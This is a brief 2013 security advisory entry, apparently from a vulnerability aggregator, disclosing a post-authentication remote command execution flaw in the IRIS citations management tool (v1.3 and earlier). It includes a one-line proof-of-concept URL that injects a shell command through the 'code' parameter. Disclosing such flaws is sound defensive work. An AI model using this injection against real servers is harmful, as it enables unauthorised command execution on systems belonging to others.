Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29057
HistoryFeb 18, 2013 - 12:00 a.m.

I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution

2013-02-1800:00:00
vulners.com
38

A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands.

Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

PoC:

http://[target]/[path]/index.php?p=add&import=spnro&code=a"ÂąT+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon